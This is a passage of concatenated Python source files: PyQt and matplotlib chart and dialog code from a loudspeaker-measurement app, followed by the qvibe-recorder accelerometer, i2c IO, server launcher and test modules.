def redraw_visible(self):
if self.__visible_chart is not None and self.__locked is not True:
display = getattr(self.__visible_chart, 'display', None)
if display is not None and callable(display):
display()
def lock(self):
''' flags the model as locked so changes do not result in a redraw '''
self.__locked = True
def unlock(self, should_redraw):
''' flags the model as unlocked and redraws '''
self.__locked = False
if should_redraw:
self.redraw_visible()
class DisplayControlDialog(QDialog, Ui_displayControlsDialog):
'''
Display Parameters dialog
'''
def __init__(self, parent, display_model, measurement_model):
super(DisplayControlDialog, self).__init__(parent)
self.setupUi(self)
self.__display_model = display_model
self.__measurement_model = measurement_model
self.yAxisRange.setValue(self.__display_model.db_range)
self.normaliseCheckBox.setChecked(self.__display_model.normalised)
for m in self.__measurement_model:
self.normalisationAngle.addItem(str(m.h))
self.__select_combo(self.normalisationAngle, str(self.__display_model.normalisation_angle))
stored_idx = 0
from app import cms_by_name
for idx, (name, cm) in enumerate(cms_by_name.items()):
self.colourMapSelector.addItem(name)
if name == self.__display_model.colour_map:
stored_idx = idx
self.colourMapSelector.setCurrentIndex(stored_idx)
self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply)
@staticmethod
def __select_combo(combo, value):
if value is not None:
idx = combo.findText(value)
if idx != -1:
combo.setCurrentIndex(idx)
return idx
return None
def apply(self):
''' Updates the parameters and reanalyses the model. '''
from app import wait_cursor
with wait_cursor():
self.__display_model.accept(self.colourMapSelector.currentText(),
self.yAxisRange.value(),
self.normaliseCheckBox.isChecked(),
self.normalisationAngle.currentText(),
self.polarRange.isChecked())
```
#### File: python/model/magnitude.py
```python
import logging
import numpy as np
from matplotlib import animation
from qtpy import QtCore
from qtpy.QtWidgets import QListWidgetItem
from model import configureFreqAxisFormatting, format_axes_dbfs_hz, set_y_limits, SINGLE_SUBPLOT_SPEC, \
calculate_dBFS_Scales
from model.measurement import CLEAR_MEASUREMENTS, LOAD_MEASUREMENTS
logger = logging.getLogger('magnitude')
class MagnitudeModel:
'''
Allows a set of measurements to be displayed on a chart as magnitude responses.
'''
def __init__(self, chart, measurement_model, display_model, model_listener=None,
subplot_spec=SINGLE_SUBPLOT_SPEC, show_legend=True, selector=None, depends_on=lambda: False):
self.__chart = chart
self.__axes = self.__chart.canvas.figure.add_subplot(subplot_spec)
format_axes_dbfs_hz(self.__axes)
self.__curves = {}
self.__refresh_data = False
self.name = f"magnitude"
self.__measurement_model = measurement_model
self.__model_listener = model_listener
self.__show_legend = show_legend
self.__measurement_model.register_listener(self)
self.__display_model = display_model
self.__selector = selector
self.__depends_on = depends_on
if self.__selector is not None:
self.__selector.itemSelectionChanged.connect(self.set_visible)
self.update_decibel_range(draw=False)
def set_visible(self):
''' ensures the visible curves tracks the contents of the selector '''
selected = [x.text() for x in self.__selector.selectedItems()]
for name, curve in self.__curves.items():
curve.set_visible(name in selected)
self.__chart.canvas.draw_idle()
def __repr__(self):
return self.name
def should_refresh(self):
return self.__refresh_data or self.__depends_on()
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
if draw:
set_y_limits(self.__axes, self.__display_model.db_range)
self.__chart.canvas.draw_idle()
def display(self):
'''
Updates the contents of the magnitude chart
'''
# TODO might need to update the ylim even if we haven't refreshed
if self.should_refresh():
# pressure
data = self.__measurement_model.get_magnitude_data()
current_names = [x.display_name for x in data]
all_y = [x.y for x in data]
for idx, x in enumerate(data):
self._create_or_update_curve(x, self.__axes, self.__chart.get_colour(idx, len(self.__measurement_model)))
# power
power = self.__measurement_model.power_response
if power is not None:
self._create_or_update_curve(power, self.__axes, 'k')
all_y.append(power.y)
current_names.append(power.display_name)
# di
di = self.__measurement_model.di
if di is not None:
self._create_or_update_curve(di, self.__axes, 'k')
all_y.append(di.y)
current_names.append(di.display_name)
# scales
self._update_y_lim(np.concatenate(all_y), self.__axes)
# delete redundant data
to_delete = [k for k in self.__curves.keys() if k not in current_names]
for d in to_delete:
self.__curves[d].remove()
del self.__curves[d]
if self.__selector is not None:
for item in self.__selector.findItems(d, QtCore.Qt.MatchExactly):
self.__selector.takeItem(self.__selector.row(item))
# legend
if self.__show_legend:
lines = self.__curves.values()
if self.__axes.get_legend() is not None:
self.__axes.get_legend().remove()
self.__axes.legend(lines, [l.get_label() for l in lines], loc=8, ncol=4, fancybox=True, shadow=True)
# selector
if self.__selector is not None:
self.__selector.selectAll()
else:
self.__chart.canvas.draw_idle()
self.__refresh_data = False
else:
ylim = self.__axes.get_ylim()
if ylim[1] - ylim[0] != self.__display_model.db_range:
self.update_decibel_range()
def _update_y_lim(self, data, axes):
configureFreqAxisFormatting(axes)
ymax, ymin, _, _ = calculate_dBFS_Scales(data, max_range=self.__display_model.db_range)
axes.set_ylim(bottom=ymin, top=ymax)
def _create_or_update_curve(self, data, axes, colour):
curve = self.__curves.get(data.display_name, None)
if curve:
curve.set_data(data.x, data.y)
else:
self.__curves[data.display_name] = axes.semilogx(data.x, data.y,
linewidth=2,
antialiased=True,
linestyle='solid',
color=colour,
label=data.display_name)[0]
if self.__selector is not None:
self.__selector.addItem(QListWidgetItem(data.display_name, self.__selector))
def on_update(self, event_type, **kwargs):
'''
handles measurement model changes
If event type is activation toggle then changes the associated curve visibility.
If event type is analysis change then the model is marked for refresh.
:param event_type: the event.
:param idx: the measurement idx.
'''
if self.__model_listener:
self.__model_listener.on_update(event_type, **kwargs)
if event_type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif event_type == CLEAR_MEASUREMENTS:
self.clear()
def clear(self):
'''
clears the graph.
'''
self.__axes.clear()
self.__curves = {}
format_axes_dbfs_hz(self.__axes)
if self.__selector is not None:
self.__selector.clear()
class AnimatedSingleLineMagnitudeModel:
'''
Allows a single measurement from a selection of magnitude data to be displayed on a chart.
'''
def __init__(self, chart, measurement_model, display_model, marker_data,
subplot_spec=SINGLE_SUBPLOT_SPEC, redraw_on_display=True):
self._chart = chart
self.__measurement_model = measurement_model
self.__measurement_model.register_listener(self)
self.__axes = self._chart.canvas.figure.add_subplot(subplot_spec)
self.__secondary_axes = self.__axes.twinx()
self.__secondary_axes.set_ylim(bottom=0, top=30)
format_axes_dbfs_hz(self.__axes)
self.name = f"single-magnitude"
self.__refresh_data = False
self.x_position = None
self.y_position = None
self.__pressure_data = None
self.__pressure_curve = None
self.__pressure_marker = None
self.__power_data = None
self.__power_curve = None
self.__power_marker = None
self.__di_data = None
self.__di_curve = None
self.__di_marker = None
self.__vline = None
self.__ani = None
self.__y_range_update_required = False
self.__redraw_on_display = redraw_on_display
self.__display_model = display_model
self.__marker_data = marker_data
def __repr__(self):
return self.name
def should_refresh(self):
return self.__refresh_data
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
self.__y_range_update_required = True
set_y_limits(self.__axes, self.__display_model.db_range)
if self.__ani:
# have to clear the blit cache to get the r grid to redraw as per
# https://stackoverflow.com/questions/25021311/matplotlib-animation-updating-radial-view-limit-for-polar-plot
self.__ani._blit_cache.clear()
if draw:
self._chart.canvas.draw_idle()
self.__y_range_update_required = False
def display(self):
'''
Gets fresh data and redraws.
:return: true if it redrew.
'''
redrew = False
if self.should_refresh():
if self.__pressure_curve is None:
# pressure
self.__pressure_data = self.__measurement_model.get_magnitude_data()
self.__pressure_curve = self.__axes.semilogx(self.__pressure_data[0].x,
[np.nan] * len(self.__pressure_data[0].x),
linewidth=2,
antialiased=True,
linestyle='solid')[0]
self.__pressure_marker = self.__axes.plot(0, 0, 'bo', markersize=8)[0]
all_data = [x.y for x in self.__pressure_data]
# directivity
if self.__di_data:
self.__di_curve = self.__secondary_axes.semilogx(self.__di_data[0].x,
[np.nan] * len(self.__pressure_data[0].x),
linewidth=2,
antialiased=True,
linestyle='--')[0]
self.__di_marker = self.__secondary_axes.plot(0, 0, 'bo', markersize=8)[0]
if self.__power_data:
# power
self.__power_curve = self.__axes.semilogx(self.__power_data.x,
self.__power_data.y,
linewidth=2,
antialiased=True,
color='k',
linestyle='solid')[0]
self.__power_marker = self.__axes.plot(0, 0, 'ko', markersize=8)[0]
all_data.append(self.__power_data.y)
# line
self.__vline = self.__axes.axvline(x=0, linewidth=2, color='gray', linestyle=':')
# scales
ymax, ymin, _, _ = calculate_dBFS_Scales(np.concatenate(all_data),
max_range=self.__display_model.db_range)
self.__axes.set_ylim(bottom=ymin, top=ymax, auto=False)
configureFreqAxisFormatting(self.__axes)
self.__y_range_update_required = False
self.__refresh_data = False
redrew = True
else:
if self.__pressure_curve is not None:
if self.__y_range_update_required:
self.update_decibel_range(self.__redraw_on_display)
# make sure we are animating
if self.__ani is None and self.__pressure_data is not None:
logger.info(f"Starting animation in {self.name}")
self.__ani = animation.FuncAnimation(self._chart.canvas.figure, self.redraw, interval=50,
init_func=self.initAnimation, blit=True, save_count=50, repeat=False)
return redrew
def initAnimation(self):
'''
Inits a blank screen.
:return: the curve artist.
'''
self.__pressure_curve.set_ydata([np.nan] * len(self.__pressure_data[0].x))
vals = [self.__pressure_curve, self.__pressure_marker]
if self.__power_data:
vals.append(self.__power_curve)
vals.append(self.__power_marker)
if self.__di_data:
vals.append(self.__di_curve)
vals.append(self.__di_marker)
vals.append(self.__vline)
return vals
def __find_nearest_xy(self, curve):
return np.argmax(curve.x >= self.x_position)
def redraw(self, frame, *fargs):
'''
Redraws the graph based on the yPosition.
'''
curve_data, curve_idx = self.find_nearest_xy_data()
if curve_idx != -1:
colour = self._chart.get_colour(curve_idx, len(self.__measurement_model))
self.__pressure_curve.set_ydata(curve_data.y)
self.__pressure_curve.set_color(colour)
idx = self.__find_nearest_xy(curve_data)
self.__pressure_marker.set_data(curve_data.x[idx], curve_data.y[idx])
self.__marker_data.freq = curve_data.x[idx]
self.__marker_data.spl = curve_data.y[idx]
self.__pressure_marker.set_color(colour)
self.__vline.set_xdata([curve_data.x[idx], curve_data.x[idx]])
if self.__power_data:
di_y = (curve_data.y * curve_data.y) / self.__power_data.y
di_y += (0.0 - di_y[0])
self.__di_curve.set_ydata(di_y)
self.__di_curve.set_color(colour)
self.__di_marker.set_color(colour)
self.__di_marker.set_data(curve_data.x[idx], di_y[idx])
self.__power_marker.set_data(curve_data.x[idx], self.__power_data.y[idx])
self.__marker_data.di = di_y[idx]
self.__marker_data.power = self.__power_data.y[idx]
if self.__power_data:
return self.__pressure_curve, self.__pressure_marker, self.__power_curve, self.__power_marker, self.__di_curve, self.__di_marker, self.__vline
else:
return self.__pressure_curve, self.__pressure_marker, self.__vline
def find_nearest_xy_data(self):
'''
Searches the available data to find the curve that is the closest hAngle to our current yPosition.
:return: (curve_data, curve_idx) or (None, -1) if nothing is found.
'''
curve_idx = -1
curve_data = None
delta = 100000000
if self.y_position is not None:
for idx, x in enumerate(self.__pressure_data):
new_delta = abs(self.y_position - x.h)
if new_delta < delta:
delta = new_delta
curve_idx = idx
curve_data = x
elif new_delta > delta:
break
return curve_data, curve_idx
def on_update(self, event_type, **kwargs):
'''
handles measurement model changes
If event type is activation toggle then changes the associated curve visibility.
If event type is analysis change then the model is marked for refresh.
:param event_type: the event.
:param idx: the measurement idx.
'''
if event_type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif event_type == CLEAR_MEASUREMENTS:
self.clear()
def clear(self, draw=True):
'''
clears the graph.
'''
self.stop_animation()
self.__axes.clear()
self.__pressure_curve = None
format_axes_dbfs_hz(self.__axes)
if draw:
self._chart.canvas.draw_idle()
def stop_animation(self):
'''
Stops the animation.
'''
if self.__ani is not None:
logger.info(f"Stopping animation in {self.name}")
ani = self.__ani
self.__ani = None
self.__refresh_data = True
ani._stop()
```
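A detail worth noting from `redraw` above: the directivity trace is derived on the fly as pressure squared over power, then shifted so the first bin reads zero. A standalone sketch of that arithmetic with invented values:
```python
import numpy as np

# Recreates the di_y computation from AnimatedSingleLineMagnitudeModel.redraw.
pressure = np.array([2.0, 4.0, 8.0])  # invented pressure magnitudes
power = np.array([1.0, 2.0, 4.0])     # invented power response

di = (pressure * pressure) / power    # p^2 / power, as in redraw()
di += 0.0 - di[0]                     # re-reference so the first bin is 0
print(di)                             # [ 0.  4. 12.]
```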
#### File: python/ui/display.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_displayControlsDialog(object):
def setupUi(self, displayControlsDialog):
displayControlsDialog.setObjectName("displayControlsDialog")
displayControlsDialog.resize(302, 188)
self.gridLayout = QtWidgets.QGridLayout(displayControlsDialog)
self.gridLayout.setObjectName("gridLayout")
self.buttonBox = QtWidgets.QDialogButtonBox(displayControlsDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Apply|QtWidgets.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.colourSchemeLabel = QtWidgets.QLabel(displayControlsDialog)
self.colourSchemeLabel.setObjectName("colourSchemeLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.colourSchemeLabel)
self.colourMapSelector = QtWidgets.QComboBox(displayControlsDialog)
self.colourMapSelector.setObjectName("colourMapSelector")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.colourMapSelector)
self.decibelRangeLabel = QtWidgets.QLabel(displayControlsDialog)
self.decibelRangeLabel.setObjectName("decibelRangeLabel")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.decibelRangeLabel)
self.yAxisRange = QtWidgets.QSpinBox(displayControlsDialog)
self.yAxisRange.setMinimum(10)
self.yAxisRange.setMaximum(120)
self.yAxisRange.setSingleStep(5)
self.yAxisRange.setProperty("value", 60)
self.yAxisRange.setObjectName("yAxisRange")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.yAxisRange)
self.normaliseCheckBox = QtWidgets.QCheckBox(displayControlsDialog)
self.normaliseCheckBox.setObjectName("normaliseCheckBox")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.normaliseCheckBox)
self.normalisationAngleLabel = QtWidgets.QLabel(displayControlsDialog)
self.normalisationAngleLabel.setObjectName("normalisationAngleLabel")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.normalisationAngleLabel)
self.normalisationAngle = QtWidgets.QComboBox(displayControlsDialog)
self.normalisationAngle.setObjectName("normalisationAngle")
self.normalisationAngle.addItem("")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.normalisationAngle)
self.polarRangeLabel = QtWidgets.QLabel(displayControlsDialog)
self.polarRangeLabel.setObjectName("polarRangeLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.polarRangeLabel)
self.polarRange = QtWidgets.QCheckBox(displayControlsDialog)
self.polarRange.setObjectName("polarRange")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.polarRange)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.retranslateUi(displayControlsDialog)
self.buttonBox.accepted.connect(displayControlsDialog.accept)
self.buttonBox.rejected.connect(displayControlsDialog.reject)
QtCore.QMetaObject.connectSlotsByName(displayControlsDialog)
def retranslateUi(self, displayControlsDialog):
_translate = QtCore.QCoreApplication.translate
displayControlsDialog.setWindowTitle(_translate("displayControlsDialog", "Display"))
self.colourSchemeLabel.setText(_translate("displayControlsDialog", "Colour Scheme"))
self.decibelRangeLabel.setText(_translate("displayControlsDialog", "Y Range"))
self.yAxisRange.setSuffix(_translate("displayControlsDialog", "dB"))
self.normaliseCheckBox.setText(_translate("displayControlsDialog", "Normalise?"))
self.normalisationAngleLabel.setText(_translate("displayControlsDialog", "Normalisation Angle"))
self.normalisationAngle.setItemText(0, _translate("displayControlsDialog", "0"))
self.polarRangeLabel.setText(_translate("displayControlsDialog", "Polar Range"))
self.polarRange.setText(_translate("displayControlsDialog", "+/- 180?"))
```
#### File: python/ui/savechart.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_saveChartDialog(object):
def setupUi(self, saveChartDialog):
saveChartDialog.setObjectName("saveChartDialog")
saveChartDialog.setWindowModality(QtCore.Qt.ApplicationModal)
saveChartDialog.resize(259, 155)
saveChartDialog.setModal(True)
self.gridLayout = QtWidgets.QGridLayout(saveChartDialog)
self.gridLayout.setObjectName("gridLayout")
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.widthPixels = QtWidgets.QSpinBox(saveChartDialog)
self.widthPixels.setMinimum(1)
self.widthPixels.setMaximum(8192)
self.widthPixels.setObjectName("widthPixels")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.widthPixels)
self.heightPixels = QtWidgets.QSpinBox(saveChartDialog)
self.heightPixels.setEnabled(False)
self.heightPixels.setMinimum(1)
self.heightPixels.setMaximum(8192)
self.heightPixels.setObjectName("heightPixels")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.heightPixels)
self.label = QtWidgets.QLabel(saveChartDialog)
self.label.setObjectName("label")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)
self.label_2 = QtWidgets.QLabel(saveChartDialog)
self.label_2.setObjectName("label_2")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_2)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(saveChartDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.retranslateUi(saveChartDialog)
self.buttonBox.accepted.connect(saveChartDialog.accept)
self.buttonBox.rejected.connect(saveChartDialog.reject)
self.widthPixels.valueChanged['int'].connect(saveChartDialog.updateHeight)
QtCore.QMetaObject.connectSlotsByName(saveChartDialog)
def retranslateUi(self, saveChartDialog):
_translate = QtCore.QCoreApplication.translate
saveChartDialog.setWindowTitle(_translate("saveChartDialog", "Save Chart"))
self.label.setText(_translate("saveChartDialog", "Width"))
self.label_2.setText(_translate("saveChartDialog", "Height"))
``` |
{
"source": "3ll3d00d/qvibe-recorder",
"score": 3
} |
#### File: qvibe-recorder/qvibe/accelerometer.py
```python
import abc
import logging
import time
from qvibe.handler import Discard, ERROR
NAME = 'name'
FS = 'fs'
SAMPLE_IDX = 'idx'
ZERO_TIME = 'zt'
ACCEL_X = 'ac_x'
ACCEL_Y = 'ac_y'
ACCEL_Z = 'ac_z'
GYRO_X = 'gy_x'
GYRO_Y = 'gy_y'
GYRO_Z = 'gy_z'
TEMP = 'temp'
logger = logging.getLogger(__name__)
class Accelerometer:
"""
A simple base class to represent an accelerometer, exists to enable the system to be tested in the absence of a
physical device.
"""
def __init__(self, fs=None, samples_per_batch=None, data_handler=None):
"""
Initialises the accelerometer to use a default sample rate of 500Hz, a samples_per_batch that accommodates 1/4s
worth of data and a data_handler that simply discards the data.
:param: fs: the sample rate
:param: samples_per_batch: the number of samples that each provide_data batch should yield.
:param: data_handler: a function that accepts the data produced by initialise_device and does something with it.
"""
if fs is None:
self.fs = 500
else:
self.fs = fs
if samples_per_batch is None:
self.samples_per_batch = self.fs // 4
else:
self.samples_per_batch = samples_per_batch
if data_handler is None:
self.data_handler = Discard()
else:
self.data_handler = data_handler
self.__last_overflow = None
def run(self):
while True:
logger.warning("Running")
if self.do_init() is True:
self.record()
else:
time.sleep(1)
def do_init(self):
try:
logger.info("Initialising device")
self.initialise_device()
logger.info("Initialisation complete")
return True
except Exception as e:
logger.exception("Initialisation failed")
self.data_handler.on_init_fail(time.time(), str(e))
return False
def record(self):
try:
while True:
self.data_handler.handle(self.provide_data())
except Exception as e:
logger.exception('Unexpected exception during record loop')
self.data_handler.handle(ERROR)
@abc.abstractmethod
def provide_data(self):
"""
reads the underlying device to provide a batch of raw data.
:return: a list of data where each item is a single sample of data converted into real values and stored as a
dict.
"""
pass
@abc.abstractmethod
def initialise_device(self):
"""
initialises the underlying device
"""
pass
```
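Because `Accelerometer` leaves `initialise_device` and `provide_data` abstract, a test double only needs those two hooks. A minimal sketch, assuming the module's names import as shown:
```python
import time

from qvibe.accelerometer import Accelerometer, ACCEL_X, ACCEL_Y, ACCEL_Z

class FakeAccelerometer(Accelerometer):
    ''' Emits zeroed samples at roughly the configured rate. '''

    def initialise_device(self):
        pass  # nothing to initialise for a fake device

    def provide_data(self):
        # sleep for one batch interval then emit a batch of zeroed samples
        time.sleep(self.samples_per_batch / self.fs)
        return [{ACCEL_X: 0.0, ACCEL_Y: 0.0, ACCEL_Z: 0.0}
                for _ in range(int(self.samples_per_batch))]
```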
#### File: qvibe-recorder/qvibe/app.py
```python
import faulthandler
import logging
import threading
from twisted.internet.endpoints import TCP4ServerEndpoint
from qvibe.config import Config
from qvibe.handler import AsyncHandler
from qvibe.i2cio import WhiteNoiseProvider, mockIO, smbusIO, WavProvider
from qvibe.interface import CommandFactory
from qvibe.mpu6050 import mpu6050
from twisted.internet import reactor
logger = logging.getLogger(__name__)
# register a thread dumper
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
def create_device(device_cfg):
"""
Creates a measurement device from the input configuration.
:param: device_cfg: the device cfg.
:return: the constructed device.
"""
io_cfg = device_cfg['io']
device_type = device_cfg['type']
if device_type == 'mpu6050':
fs = device_cfg.get('fs')
name = device_cfg.get('name', 'mpu6050')
if io_cfg['type'] == 'mock':
provider = io_cfg.get('provider')
if provider is not None:
if provider == 'white noise':
data_provider = WhiteNoiseProvider()
elif provider == 'dbl':
data_provider = WavProvider(io_cfg.get('file'))
else:
raise ValueError(provider + " is not a supported mock io data provider")
else:
raise ValueError('No provider supplied for a mock io data provider')
logger.warning(f"Loading {provider} mock data provider for mpu6050")
io = mockIO(data_provider=data_provider.provide)
elif io_cfg['type'] == 'smbus':
bus_id = io_cfg['busId']
logger.warning("Loading smbus %d", bus_id)
io = smbusIO(bus_id)
else:
raise ValueError(io_cfg['type'] + " is not a supported io provider")
logger.warning(f"Loading mpu6050 {name}/{fs}")
samples_per_batch = int(device_cfg['samplesPerBatch']) if 'samplesPerBatch' in device_cfg else None
mpu = mpu6050(io, name=name, fs=fs, data_handler=AsyncHandler(), self_test=True,
samples_per_batch=samples_per_batch)
worker = threading.Thread(target=mpu.run, daemon=True)
worker.start()
return mpu
else:
raise ValueError(device_type + " is not a supported device")
def run(args=None):
""" The main routine. """
cfg = Config()
cfg.configure_logger()
devices = {device.name: device for device in [create_device(c) for c in cfg.config['accelerometers']]}
endpoint = TCP4ServerEndpoint(reactor, cfg.port)
logger.info(f"Listening on port {cfg.port}")
endpoint.listen(CommandFactory(devices))
reactor.run()
if __name__ == '__main__':
run()
```
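`create_device` is driven entirely by the config dict; a plausible example matching the keys it reads above (all values illustrative):
```python
# Illustrative config for create_device; keys mirror the lookups above.
device_cfg = {
    'type': 'mpu6050',
    'name': 'seat',              # defaults to 'mpu6050' if omitted
    'fs': 500,
    'samplesPerBatch': 125,
    'io': {
        'type': 'mock',            # or 'smbus' with a 'busId' key
        'provider': 'white noise'  # or 'dbl' with a 'file' key
    }
}
mpu = create_device(device_cfg)  # also starts the daemon worker thread
```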
#### File: qvibe-recorder/qvibe/i2cio.py
```python
import abc
from queue import Queue
from qvibe.mpu6050 import mpu6050
class i2cIO(object):
"""
A thin wrapper on the smbus for reading and writing data. Exists to allow unit testing without a real device
connected.
"""
def __init__(self):
pass
@abc.abstractmethod
def write(self, i2c_address, register, val):
"""
Writes data to the device.
:param: i2c_address: the address to write to.
:param: register: the location to write to.
:param: val: the value to write.
"""
pass
@abc.abstractmethod
def read(self, i2c_address, register):
"""
Reads data from the device.
:param: i2c_address: the address to read from.
:param: register: the register to read from.
:return: the data read.
"""
pass
@abc.abstractmethod
def read_block(self, i2c_address, register, length):
"""
Reads a block of data from the device.
:param: i2c_address: the address to read from.
:param: register: the register to read from.
:param: length: no of bytes to read.
:return: the data read.
"""
pass
class mockIO(i2cIO):
def __init__(self, data_provider=None):
super().__init__()
self.values_written = []
self.data_provider = data_provider
self.vals_to_read = Queue()
def write(self, i2c_address, register, val):
self.values_written.append([i2c_address, register, val])
def read_block(self, i2c_address, register, length):
if self.data_provider is not None:
ret = self.data_provider(register, length)
if ret is not None:
return ret
return self.vals_to_read.get_nowait()
def read(self, i2c_address, register):
if self.data_provider is not None:
ret = self.data_provider(register)
if ret is not None:
return ret
return self.vals_to_read.get_nowait()
class MockIoDataProvider:
def __init__(self, samples):
self.idx = 0
self.samples = samples
def provide(self, register, length=None):
if register == mpu6050.MPU6050_RA_INT_STATUS:
return 0x01
elif register == mpu6050.MPU6050_RA_FIFO_COUNTH:
# always 36 bytes
return [0b00000000, 0b00100100]
elif register == mpu6050.MPU6050_RA_FIFO_R_W:
to_read = length // 6
buf = bytearray()
for i in range(0, to_read):
self.add_value(buf, 'x')
self.add_value(buf, 'y')
self.add_value(buf, 'z')
self.idx += 1
from time import sleep
sleep(0.002 * to_read)
return buf
else:
if length is None:
return 0b00000000
else:
return [x.to_bytes(1, 'big') for x in range(length)]
def add_value(self, buf, key):
samples = self.samples[key]
sample_val = samples[self.idx % len(samples)]
val = self.convert_value(sample_val)
try:
b = bytearray(val.to_bytes(2, 'big'))
except OverflowError:
print("Value too big - " + str(val) + " - replacing with 0")
val = 0
b = bytearray(val.to_bytes(2, 'big'))
buf.extend(b)
def convert_value(self, val):
i = int((val * 32768))
return i if i >= 0 else 65536 + i
class ModulatedNoiseProvider(MockIoDataProvider):
def __init__(self):
import random
super().__init__({
'x': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'y': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'z': [random.gauss(0, 0.25) for _ in range(0, 1000)]
})
class WhiteNoiseProvider(MockIoDataProvider):
def __init__(self):
import random
super().__init__({
'x': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'y': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'z': [random.gauss(0, 0.25) for _ in range(0, 1000)]
})
class WavProvider(MockIoDataProvider):
'''
Reads data created from a wav file as per
f.write(struct.pack('d'*len(data), *data))
'''
def __init__(self, file):
import struct
import os
sz = os.stat(file).st_size
if sz % 8 != 0:
raise ValueError(f"File size is {sz}, can't be a dbl file")
with open(file, mode='rb') as f:
data = list(struct.unpack('d' * int(sz / 8), f.read(sz)))
if data is not None:
super().__init__({
'x': data,
'y': data,
'z': data
})
class smbusIO(i2cIO):
"""
an implementation of i2c_io which talks over the smbus.
"""
def __init__(self, bus_id=1):
super().__init__()
from smbus2 import SMBus
self.bus = SMBus(bus=bus_id)
def write(self, i2c_address, register, val):
"""
Delegates to smbus.write_byte_data
"""
return self.bus.write_byte_data(i2c_address, register, val)
def read(self, i2c_address, register):
"""
Delegates to smbus.read_byte_data
"""
return self.bus.read_byte_data(i2c_address, register)
def read_block(self, i2c_address, register, length):
"""
Delegates to smbus.read_i2c_block_data
"""
return self.bus.read_i2c_block_data(i2c_address, register, length)
```
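`MockIoDataProvider.convert_value` packs a float in [-1, 1) into the unsigned 16-bit two's-complement form the real registers carry; decoding reverses the mapping. A round-trip sketch:
```python
def encode(val):
    # mirrors MockIoDataProvider.convert_value
    i = int(val * 32768)
    return i if i >= 0 else 65536 + i

def decode(raw):
    # inverse mapping: values >= 0x8000 are negative
    signed = raw - 65536 if raw >= 32768 else raw
    return signed / 32768

assert decode(encode(0.5)) == 0.5
assert decode(encode(-0.25)) == -0.25
```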
#### File: qvibe/test/test_handler.py
```python
import os
import shutil
import time
from qvibe.handler import DataHandler, AsyncHandler, CSVLogger
class MyHandler(DataHandler):
def __init__(self):
self.event_time = None
self.events = []
self.message = None
def on_init_fail(self, event_time, message):
self.event_time = event_time
self.message = message
def handle(self, data):
self.events.append(data)
def test_async_handles_all_events():
logger = MyHandler()
async_handler = AsyncHandler(delegate=logger)
do_loop(async_handler)
time.sleep(0.5)
assert len(logger.events) == 100
for i in range(0, 100):
assert logger.events[i] == make_event(i)
def do_loop(handler, use_list_vals=False):
for i in range(0, 100):
handler.handle(make_event(i, use_list_vals))
handler.on_init_fail(time.time(), "endtest")
def make_event(i, use_list_vals=False):
import collections
dict = collections.OrderedDict()
dict["d"] = "d" + str(i)
dict["b"] = "b" + str(i)
if use_list_vals:
return [list(dict.values())]
else:
return [dict]
def test_csvWritesEachRowToFile(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
do_loop(logger)
verifyCsv(tmpdir)
def test_csvWritesEachRowToFileWhenAcceptingValues(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
do_loop(logger, True)
verifyCsv(tmpdir, True)
def test_csvWritesEachRowToFileWhenAsync(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
async_handler = AsyncHandler(logger)
do_loop(async_handler)
time.sleep(0.5)
verifyCsv(tmpdir)
def setupCsv(tmpdir):
output_dir = os.path.join(tmpdir, "test")
if os.path.exists(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
return output_dir
def verifyCsv(tmpdir, use_list_vals=False):
output_file = os.path.join(tmpdir, "test", 'owner', 'data.out')
assert os.path.exists(output_file)
with open(output_file) as f:
lines = f.read().splitlines()
if use_list_vals is True:
assert len(lines) == 100
for i in range(0, 100):
assert lines[i] == "d" + str(i) + ",b" + str(i)
else:
assert len(lines) == 101
assert lines[0] == "d,b"
for i in range(0, 100):
assert lines[i + 1] == "d" + str(i) + ",b" + str(i)
``` |
